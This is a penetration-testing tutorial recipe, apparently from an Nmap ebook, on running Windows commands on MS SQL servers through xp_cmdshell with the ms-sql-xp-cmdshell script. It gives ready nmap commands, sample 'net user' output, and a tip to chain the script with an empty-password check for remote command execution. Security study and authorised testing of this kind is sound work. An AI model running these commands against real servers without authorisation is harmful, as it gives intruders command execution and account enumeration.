Running commands through the command shell on MS SQL servers

MS SQL servers have a stored procedure called xp_cmdshell. This feature allows programmers to execute commands through the MS SQL server. Nmap helps us execute custom shell commands when this option is enabled.

This recipe shows how to run Windows commands through MS SQL servers by using Nmap.

How to do it...

Open your terminal and enter the following Nmap command:

$ nmap --script-args 'mssql.username="<user>",mssql.password=""' --script ms-sql-xp-cmdshell -p1433 <target>

The results will be included in the script output section:

PORT     STATE SERVICE  VERSION 
1433/tcp open  ms-sql-s Microsoft SQL Server 2011 11.00.1750.00 
| ms-sql-xp-cmdshell: 
|   [192.168.1.102:1433] 
|     Command: net user 
|       output 
|       ====== 
|       
|       User accounts for \ 
|       
|       ------------------------------------------------------------------------------- 
|       Administrator          cldrn             Guest          
|       postgres                 
|       The command completed with one or more errors. 
|       
|_

How it works...

MS SQL servers usually run on TCP port 1433. The argument --script-args 'mssql.username="<user>",mssql.password=""' --script ms-sql-xp-cmdshell -p1433 makes Nmap initiate the script ms-sql-xp-cmdshell and then sets the authentication credentials to be used if an MS SQL server is running on port 1433.

The script ms-sql-xp-cmdshell was written by Patrik Karlsson. It attempts to run an OS command through the stored procedure xp_cmdshell found on MS SQL servers. This script depends on the mssql library. Its documentation can be found at http://nmap.org/nsedoc/lib/mssql.html.

There's more...

By default, ms-sql-xp-cmdshell will attempt to run the command ipconfig /all, but you can specify a different one by using the script argument ms-sql-xp-cmdshell.cmd:

$ nmap --script-args 'ms-sql-xp-cmdshell.cmd="<command>",mssql.username="<user>",mssql.password=""' --script ms-sql-xp-cmdshell -p1433 <target>

If the server does not have the xp_cmdshell procedure enabled, you should see the following message:

| ms-sql-xp-cmdshell: 
|   (Use --script-args=ms-sql-xp-cmdshell.cmd='<CMD>' to change command.) 
|   [192.168.1.102MSSQLSERVER] 
|_    Procedure xp_cmdshell disabled. For more information see "Surface Area Configuration" in Books Online.

If you did not provide any valid credentials for authentication, the following message will be displayed:

| ms-sql-xp-cmdshell: 
|   [192.168.1.102:1433] 
|_    ERROR: No login credentials.

Remember that you can use this script in combination with ms-sql-empty-password to automatically retrieve the network configuration of an MS SQL server with a sysadmin account with an empty password:

$ nmap --script ms-sql-xp-cmdshell,ms-sql-empty-password -p1433 <target>

See also

  • The Retrieving MS SQL server information recipe
  • The Brute forcing MS SQL passwords recipe
  • The Dumping the password hashes of an MS SQL server recipe
  • The Finding sysadmin accounts with empty passwords on MS SQL servers recipe
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.134.118.95